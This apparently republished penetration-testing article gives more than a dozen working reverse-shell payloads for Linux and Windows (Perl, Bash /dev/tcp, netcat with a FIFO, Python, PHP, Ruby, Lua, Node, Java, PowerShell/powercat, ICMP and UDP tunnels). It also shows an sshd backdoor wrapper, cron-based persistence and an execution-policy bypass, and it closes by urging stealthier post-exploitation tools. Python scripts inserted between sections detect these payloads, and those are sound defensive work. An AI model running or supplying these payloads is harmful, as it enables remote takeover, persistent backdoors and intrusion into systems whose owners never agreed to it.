Mastering Reverse Shells: 30+ Techniques Across Linux, Windows, and Network Protocols

This article provides a comprehensive collection of reverse‑shell techniques—including Perl, Bash, Python, PowerShell, Java, and protocol‑specific methods like ICMP, UDP, and DNS—complete with command‑line examples, code snippets, and practical tips for both Linux and Windows environments.


Introduction

When a penetration test requires an interactive shell on a target, transferring external tools can be risky or impossible; leveraging the target's native utilities and language runtimes often yields a cleaner solution. This guide enumerates dozens of reverse‑shell payloads that use built‑in tools across Linux and Windows.

Target Environment Overview

win7          192.168.1.128
centos6.8    192.168.1.129
win2008R2    192.168.1.131
kali          192.168.1.147

Linux Reverse‑Shell Techniques

Perl socket – Most Linux distributions ship Perl; the one‑liner opens a TCP socket and execs an interactive Bash.

C:\>nc -lvp 53
# perl -e 'use Socket;$i="192.168.1.128";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

/dev/tcp – Bash can write to the special device file to forward I/O.

C:\>nc -lvp 80
# /bin/bash -i >& /dev/tcp/192.168.1.128/80 0>&1

SSH daemon binding – Bind sshd to a local port and connect to it.

# netstat -tulnp | grep "8080"
# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=8080;
# ssh [email protected] -p 8080
# pkill su

Socat – Forward STDIO over TCP; here it is paired with a Perl wrapper around sshd that hands out a shell only when the client's source port (getpeername) matches, which is why socat sets sourceport=13377.

# cd /usr/sbin/
# mv sshd ../bin/
# echo '#!/usr/bin/perl' >sshd
# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
# chmod u+x sshd
# /etc/init.d/sshd restart
# socat STDIO TCP4:192.168.1.129:22,sourceport=13377

Netcat with FIFO – Use mkfifo to pipe data when the traditional -e option is unavailable.

C:\>nc -lvp 8080
# rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 8080 >/tmp/f

Cryptcat – Encrypted netcat with password support.

# cryptcat -vv -l -p 25 -k sec
# cryptcat -vv -l -p 80 -k sec
# cryptcat 192.168.1.129 80 -k sec|cmd.exe|cryptcat 192.168.1.129 25 -k sec

Awk – Loop over a TCP socket and execute received commands.

# awk 'BEGIN{s="/inet/tcp/0/192.168.1.128/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

Python socket – One‑liner that duplicates file descriptors and spawns Bash.

C:\>nc -lvp 8080
# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.128",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'
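The Perl socket, /dev/tcp and Python dup2 payloads above all end in the same host state: a shell whose descriptors 0, 1 and 2 point at one TCP socket instead of a terminal or pipe. On Linux that is visible in /proc/<pid>/fd, which makes it a cheap host-side check. The following is an added illustrative example, not code from the original article; the process table at the bottom is constructed sample data and `read_proc_fds` is the only part that touches a live system.

```python
"""Added example: spot a shell whose standard descriptors are a socket.

The Perl socket, /dev/tcp redirection and Python os.dup2 one-liners all leave
a shell process whose fds 0, 1 and 2 resolve to the same socket inode.
Illustrative code added to this page (not from the original article); the
SAMPLE_PROCS table is constructed.
"""
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def is_socket_stdio(fd_targets):
    """fd_targets maps fd number -> readlink() result for that descriptor.

    True when fds 0, 1 and 2 are all present and all resolve to the same
    socket inode, which is exactly what dup2() or '>& /dev/tcp/...' produce.
    """
    targets = [fd_targets.get(fd) for fd in (0, 1, 2)]
    if not all(t and SOCKET_RE.match(t) for t in targets):
        return False
    return len(set(targets)) == 1


def classify(proc):
    """proc: dict with 'pid', 'comm' and 'fds' (fd -> link target).

    'reverse-shell-like' is an interactive shell wired straight to a socket;
    'socket-stdio' is any other process in that state (some daemons do this
    legitimately, so it is a lead rather than an alert on its own).
    """
    if is_socket_stdio(proc["fds"]):
        return "reverse-shell-like" if proc["comm"] in SHELLS else "socket-stdio"
    return "normal"


def read_proc_fds(pid):
    """Live reader for a real Linux host (not exercised by the sample data)."""
    base = f"/proc/{pid}/fd"
    fds = {}
    for name in os.listdir(base):
        try:
            fds[int(name)] = os.readlink(os.path.join(base, name))
        except OSError:
            continue            # descriptor closed between listdir and readlink
    return fds


def scan_table(procs):
    """Return {pid: verdict} for every process that is not 'normal'."""
    out = {}
    for p in procs:
        verdict = classify(p)
        if verdict != "normal":
            out[p["pid"]] = verdict
    return out


# Constructed sample process table (what /proc/<pid>/fd would show).
SAMPLE_PROCS = [
    {"pid": 1201, "comm": "bash",
     "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0", 255: "/dev/pts/0"}},
    {"pid": 1342, "comm": "bash",
     "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    {"pid": 1400, "comm": "python",
     "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]", 3: "socket:[48213]"}},
    {"pid": 1500, "comm": "sshd",
     "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[777]"}},
]

if __name__ == "__main__":
    for pid, verdict in scan_table(SAMPLE_PROCS).items():
        print(pid, verdict)
```

In the sample, pid 1342 is what the /dev/tcp and Perl payloads leave behind, and pid 1400 plus its child bash is what the Python one-liner leaves (the interpreter keeps the socket on fd 3 as well as on 0-2). On a real host, feed `read_proc_fds(pid)` and the process name from /proc/<pid>/comm into `classify`; a wrapped shell whose socket inode also appears in /proc/net/tcp with a foreign address is the strongest signal.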

Crontab persistence – Schedule a reverse‑shell command to run every minute.

# (crontab -l; printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.128\",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'
") | crontab -
# crontab -e

PHP socket – Useful on compromised web servers.

/usr/local/php/bin/php -r '$sock=fsockopen("192.168.1.128",8080);exec("/bin/bash -i <&3 >&3 2>&3");'

Java reverse shell – Compile a class that launches Bash with a /dev/tcp redirection and loops over the received commands.

public class Revs {
    public static void main(String[] args) throws Exception {
        Runtime r = Runtime.getRuntime();
        String[] cmd = {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.128/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

Ruby socket

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.128","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read};end'

Lua socket

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.1.128','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Node.js

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

Windows Reverse‑Shell Techniques

PowerShell – Bypass execution policy and import a reverse‑shell script.

powershell -exec bypass -Command "& {Import-Module 'C:\mini-reverse.ps1'}"

Powercat – PowerShell implementation of netcat.

Set-ExecutionPolicy Unrestricted
cd .\powercat
Import-Module .\powercat.ps1
powercat -c 192.168.1.128 -p 8080 -e cmd -g >> payload.ps1
nc -lvp 8080
powershell -exec bypass -Command "& {Import-Module 'C:\payload.ps1'}"

Other Windows‑specific payloads (VBS, C reverse shell, etc.) follow the same pattern of opening a TCP socket and redirecting STDIO.
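Every payload in the Linux and Windows sections above, the crontab entry included, leaves a recognisable process command line in auditd EXECVE records, EDR telemetry or Sysmon event 1. The following is an added illustrative example of matching those command lines, not code from the original article; the rule names are labels chosen here, not any vendor's rule ids, and the log records are constructed in a made-up `host|user|cmdline` format using the article's host names.

```python
"""Added example: flag reverse-shell command lines in process-creation logs.

Covers the Linux one-liners (Perl, /dev/tcp, mkfifo+nc, awk, Python, PHP,
Ruby, Lua, node -e), the crontab persistence entry and the PowerShell /
powercat invocations. Illustrative code added to this page (not from the
original article); SAMPLE_LOG is constructed.
"""
import re

# (technique label, pattern). Labels are chosen here; they are not vendor rule ids.
RULES = [
    ("bash-dev-tcp",      re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("nc-fifo",           re.compile(r"mkfifo\s+\S+.*\|\s*nc\s")),
    ("perl-socket",       re.compile(r"perl\s.*socket\(.*exec\(")),
    ("python-dup2",       re.compile(r"python\d?\s.*socket.*dup2")),
    ("php-fsockopen",     re.compile(r"php\s.*fsockopen\(")),
    ("ruby-tcpsocket",    re.compile(r"ruby\s.*TCPSocket\.new")),
    ("lua-socket",        re.compile(r"lua\s.*socket\.tcp\(\)")),
    ("awk-inet",          re.compile(r"awk\s.*/inet/(tcp|udp)/")),
    ("node-eval-socket",  re.compile(r"node\s+-e\s.*child_process")),
    ("powershell-bypass", re.compile(r"powershell.*-exec(utionpolicy)?\s+bypass", re.I)),
    ("powercat",          re.compile(r"powercat\s.*-e\s+\S+", re.I)),
    ("cron-shell",        re.compile(r"crontab\b.*(/dev/tcp|dup2|mkfifo|fsockopen)")),
]


def match_line(cmdline):
    """Return the technique labels whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(records):
    """Parse 'host|user|cmdline' records; return [(host, user, [labels])] for hits."""
    hits = []
    for raw in records:
        host, user, cmdline = raw.split("|", 2)
        found = match_line(cmdline)
        if found:
            hits.append((host, user, found))
    return hits


# Constructed sample records. Payload text is taken from the snippets on this
# page; the crontab body is abbreviated to a placeholder.
SAMPLE_LOG = [
    "centos6.8|www-data|/usr/local/php/bin/php -r '$sock=fsockopen(\"192.168.1.128\",8080);exec(\"/bin/bash -i <&3 >&3 2>&3\");'",
    "centos6.8|root|/bin/bash -i >& /dev/tcp/192.168.1.128/80 0>&1",
    "centos6.8|root|rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 8080 >/tmp/f",
    "centos6.8|root|tar czf /var/backups/etc.tgz /etc",
    "centos6.8|root|sh -c \"(crontab -l; printf '* * * * * /usr/bin/python -c <socket/dup2 one-liner>') | crontab -\"",
    "win7|Administrator|powershell -exec bypass -Command \"& {Import-Module 'C:\\payload.ps1'}\"",
    "win7|Administrator|ping -n 1 192.168.1.1",
]

if __name__ == "__main__":
    for host, user, found in scan(SAMPLE_LOG):
        print(f"{host:10} {user:14} {', '.join(found)}")
```

Command-line matching is cheap and catches the payloads exactly as this page lists them, but it is also the easiest layer to slip past with encoding or indirection, so treat it as one signal next to the socket-stdio host check and egress monitoring for shells connecting out to unexpected ports (53, 80 and 8080 are the ones the listeners above use).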

Protocol‑Specific Shells

ICMP tunneling – Compile ishd and ish to encapsulate traffic in ICMP packets, useful for bypassing strict firewalls.

# make linux
./ishd -i 6555 -t 0 -p 8080
./ish -i 6555 -t 0 -p 8080 192.168.1.129

UDP reverse shell

nc -l -p 53 -u
python udpshell.py 192.168.1.128 53 udp
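An ICMP tunnel such as the ishd/ish pair above carries its command channel in echo request/reply payloads, so the packets stop resembling ordinary ping: payload sizes change from packet to packet and the bytes are not the fixed filler that ping tools send. The following is an added illustrative example of those two heuristics, not code from the original article; the packet summaries are constructed, the tunnel data is a deterministic stand-in rather than real ish output, and the value 6555 is reused from the `-i` option above on the assumption that it is the ICMP identifier.

```python
"""Added example: heuristics for ICMP tunnelling (ishd/ish style).

Groups echo requests by ICMP identifier and flags sessions whose payload size
varies or whose bytes are not the usual ping filler. Illustrative code added
to this page (not from the original article); SAMPLE_PACKETS is constructed.
"""
from collections import defaultdict

# Windows ping sends this fixed 32-byte string; Linux iputils sends an 8-byte
# timestamp followed by consecutively increasing byte values.
WIN_FILLER = b"abcdefghijklmnopqrstuvwabcdefghi"


def is_ping_filler(payload):
    """True when the payload matches one of the two common ping fillers."""
    if payload == WIN_FILLER:
        return True
    body = payload[8:]          # skip the iputils timestamp
    if len(body) < 2:
        return False
    return all(body[i + 1] == (body[i] + 1) & 0xFF for i in range(len(body) - 1))


def assess_flows(packets):
    """packets: iterable of (icmp_id, seq, payload) for echo requests.

    Returns {icmp_id: [reasons]}; an empty list means the session looks like
    plain ping. These are heuristics for triage, not signatures.
    """
    by_id = defaultdict(list)
    for icmp_id, _seq, payload in packets:
        by_id[icmp_id].append(payload)
    verdicts = {}
    for icmp_id, payloads in by_id.items():
        reasons = []
        if len({len(p) for p in payloads}) > 1:
            reasons.append("variable payload size")
        if not all(is_ping_filler(p) for p in payloads):
            reasons.append("non-standard payload")
        verdicts[icmp_id] = reasons
    return verdicts


def linux_ping_payload(seq):
    """Constructed Linux-style ping payload: fake 8-byte timestamp + 48 filler bytes."""
    return bytes([seq & 0xFF] * 8) + bytes(range(0x10, 0x38))


def pseudo_random(n):
    """Deterministic stand-in for tunnel data (constructed, not real ish output)."""
    return bytes((i * 131 + 7) % 256 for i in range(n))


# Constructed sample: a Linux ping session, a Windows ping, and a session using
# identifier 6555 (assumed here to be what ishd/ish -i 6555 sets).
SAMPLE_PACKETS = (
    [(4321, s, linux_ping_payload(s)) for s in range(1, 5)]
    + [(4322, 1, WIN_FILLER)]
    + [(6555, s, pseudo_random(n)) for s, n in ((1, 40), (2, 97), (3, 12))]
)

if __name__ == "__main__":
    for icmp_id, reasons in assess_flows(SAMPLE_PACKETS).items():
        print(icmp_id, reasons or ["looks like ping"])
```

Byte-entropy is deliberately not used: ping filler is a run of distinct consecutive bytes, so it scores almost as high as random data on short packets. Size variance and filler matching hold up better, and both should sit alongside volume baselines (hosts that suddenly exchange thousands of echo requests with one peer) rather than replace them.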

DNS tunneling – Not detailed here; the original article points to tools such as Cobalt Strike for DNS‑based shells.

Conclusion

All these methods share the core idea of establishing a socket between attacker and target; firewalls may force the use of lower‑level protocols or port‑reusing tricks. While many of these payloads are suitable only for quick, temporary use, understanding them deepens knowledge of system internals and helps craft more robust, stealthy post‑exploitation tools.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Network Protocols, penetration testing, security tools, reverse shell
Written by

ITPUB

Official ITPUB account sharing technical insights, community news, and exciting events.
